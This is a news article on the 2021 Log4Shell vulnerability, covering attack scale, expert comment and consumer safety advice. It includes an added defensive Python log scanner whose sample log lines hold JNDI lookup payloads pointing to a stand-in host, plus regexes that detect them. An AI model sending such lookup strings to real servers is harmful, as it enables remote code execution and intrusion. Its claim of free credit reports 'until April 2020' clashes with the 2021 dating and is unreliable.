The very serious “Log4Shell” server software flaw that plagued many Minecraft players late last week has, as feared, come to affect the entire Internet. In terms of potential impact, this is one of the most serious computer security vulnerabilities the world has ever known.
“I cannot stress enough the gravity of this threat,” researcher Lotem Finkelstein of the Israeli security company Check Point told ZDNet.
His company has witnessed more than 850,000 attempted attacks on servers since a functional exploit for the vulnerability was published online Thursday (December 9). Antivirus company ESET said the US, UK, Turkey, Germany and the Netherlands were hit the hardest.
The good news: This flaw does not directly affect the average computer user, with the exception of Minecraft players using the Java edition and other PC users who for one reason or another are running a Java environment.
The Java software in question was fully patched on December 13 – an earlier version that mitigates the flaw was released on December 8 – but this only helps if you are actively running a web server. (Minecraft users just need to update their client software.)
The bad news: Hundreds of thousands, if not millions of web servers are affected and can be hacked with very little effort. Criminals are already using the flaw to install coin mining, botnet and backdoor malware on servers, Microsoft and the Swiss government report.
The flaw was rated 10 out of 10 on the severity scale from the Apache Software Foundation, which maintains the software.
“There is an extremely high, almost certain, chance that every person will interact with software or technology that has this vulnerability hidden somewhere,” John Hammond, researcher at Huntress Labs, told Dark Reading.
Servers managed by Amazon, Apple, Baidu, LinkedIn, QQ, Steam, Tencent, Tesla, and Twitter are or until recently were vulnerable to some extent, although internal backups may prevent further exploitation in each case.
(There are reports that Apple fixed its servers, but we couldn’t find the original source of these reports, and Apple hasn’t responded to our request for confirmation yet.)
We can expect to see a lot of data breaches, ransomware attacks, credit card theft, and maybe even “spam downloads” resulting from this flaw. If something is stored on a web server, it is in danger.
Bitdefender reported on December 13 that it had observed online criminals using the Log4Shell flaw to install ransomware and remote access Trojans on Windows PCs, but it was not clear whether Java had ever been installed on the affected PCs. We have contacted Bitdefender for clarification.
“Much more. We are seeing more than 1,000 exploit attempts per second. And payloads are getting scarier and scarier. Ransomware payloads started in effect within the last 24 hours.” (December 14, 2021)
Log4Shell: “incredibly simple” attack
“The exploit is actually incredibly simple – which makes it very, very scary at the same time,” Bojan Zdrnja of the nonprofit SANS Institute told Vice Motherboard.
All an attacker needs to do is send a small, carefully crafted string of text to a web server. The text could be a message board post, a login attempt, a header string in a web page request, or any other kind of data that a server would normally record in its logs, among the hundreds of thousands of entries it writes every day.
The attacker’s text tricks the targeted server into divulging secret information, or even into sending a request for files to another server, such as one the attacker controls. In response, the attacker’s server can hand back a command to download and run malware, which the targeted server will then execute.
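The mechanism just described, seen from the defender’s side: a small Python scanner, added here and not part of the original article, that runs over constructed web-server log lines and flags logged fields (request paths, User-Agent strings) carrying Log4j’s lookup syntax, including URL-encoded and nested-lookup disguises. The log lines and the host name callback.example are constructed placeholders, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Lines 2-4 carry the
# Log4j lookup syntax in a logged field: plain, URL-encoded, and disguised with
# a nested ${lower:...} lookup. Line 5 has a harmless-looking ${...} token.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://callback.example/c}"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (price ${total})"
"""

# ${lower:x} / ${upper:x} wrappers used to hide the keyword from naive matching
NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# the lookup prefix that makes Log4j contact a remote server
LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo the two most common disguises: (double) URL encoding and nested case lookups."""
    text = unquote(unquote(line))
    prev = None
    while prev != text:  # keep unwrapping until no ${lower:..}/${upper:..} remains
        prev, text = text, NESTED.sub(lambda m: m.group(1), text)
    return text


def is_suspicious(line: str) -> bool:
    """True if the normalized line contains a JNDI lookup in any logged field."""
    return LOOKUP.search(normalize(line)) is not None


def scan(log_text: str) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs that should be investigated."""
    return [(n, ln) for n, ln in enumerate(log_text.splitlines(), 1) if is_suspicious(ln)]


if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

This catches only the simplest disguises seen in early scanning traffic, so a clean result is not evidence that a server was never probed.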
A joker even put the exploit code in the name of his iPhone and got an Apple server to respond.
Jen Easterly, director of the US federal government’s Cybersecurity and Infrastructure Security Agency (CISA), called the vulnerability a “serious risk” and “an urgent challenge for network defenders” in an official notice.
CyberScoop reported that in a call with executives from technology companies on Monday, Easterly said the vulnerability “is one of the most serious I have seen in my entire career, if not the most serious.”
What can you do to defend yourself against Log4Shell?
As an end user, there is not much you can do to fix affected servers, and unless Java is installed on your own machine there is nothing for you to patch. (Security experts recommended years ago that PC and Mac users turn off Java, and there is little reason to use it these days.)
However, since cybercriminals will exploit this flaw in any way they can, you need to prepare for the worst.
Expect your personal information to be disclosed during data breaches resulting from this vulnerability and that you are at greater risk of identity theft. Expect some of your passwords to be stolen and some of your online accounts to be hacked.
Expect some of your favorite online retail websites to be hacked so that your credit card number can be stolen, a likelihood made worse by the holiday shopping season. Expect some websites you visit frequently to be corrupted to send you malware.
In other words, the risks you already face online will be magnified. Here is what you need to do.
Sign up for and use a password manager. There is no excuse not to do this, as many of the best password managers are partially or completely free. Use the password manager to make sure that all of your passwords are strong and unique. You want to do this today, not tomorrow, so that if any one of your account passwords is compromised, only that account is at risk, not all of them.
Set up a free credit freeze to limit the damage caused by potential identity theft. You can also consider one of the best identity theft protection services, but freezing credit is the best preventative measure you can take.
Monitor your credit card accounts for the next few weeks. If you see something wrong, call the phone number on the back of the card and immediately notify the bank that issued the card.
Monitor your credit reports for the next few months. Until April 2020, US residents are allowed to get a free credit report from each of the big three credit bureaus (Equifax, Experian, and TransUnion) every week.
Install some of the best antivirus software. Windows 10 and 11 already have Microsoft Defender Antivirus built in, and that’s great, but it doesn’t protect you from web threats in non-Microsoft browsers like Google Chrome or Mozilla Firefox. Microsoft Defender doesn’t help much with Android, Mac, or iOS either.
To be fair, all of these recommendations are things you really should be doing anyway. But the fact that half of the Internet is in immediate danger of being horribly hacked makes these safeguards critically important.
Log4Shell flaw explained
Very briefly, the Log4Shell vulnerability, cataloged as CVE-2021-44228, resides in open source software called Log4j, a simple logging program for Java applications that is maintained by unpaid volunteers for the Apache Foundation.
This incident has renewed calls for large companies using open source code to hand over money to developers, who work on these tools in their spare time.
“If you use software created by others in their spare time and find it useful, pay for it. It shouldn’t be a controversial opinion.” https://t.co/XDMFIcTlsW (December 11, 2021)
Logging programs are meant simply to record events, not to actively run code. But Log4j does a poor job of sanitizing the data it records. As a result, attackers can sneak malicious code in as described above and then get the Java server to execute it.
Because Java is a cross-platform environment designed to “live” on many types of operating systems, servers running Windows, Linux, Unix, or even macOS are also vulnerable.
Speculation that Java libraries such as Log4j could be vulnerable to attack dates back to a 2016 Black Hat presentation. But this particular vulnerability was reported on November 24 to the Apache Foundation by researchers at Chinese internet giant Alibaba, and a fix was quietly developed over the next two weeks and released on December 8.
Mass attacks using the flaw began as soon as the proof of concept code was released early the next morning. Internet security companies Cloudflare and Cisco Talos, however, checked their logs and found evidence of possible exploit attempts as early as December 1.
These “attempts” may have been the result of defenders pinging servers to see how widespread the vulnerability was. But it could also be that the flaw had been privately disclosed to state-sponsored security services, as a different flaw may have been earlier this year.
Updated with additional information. This story was originally posted on December 13.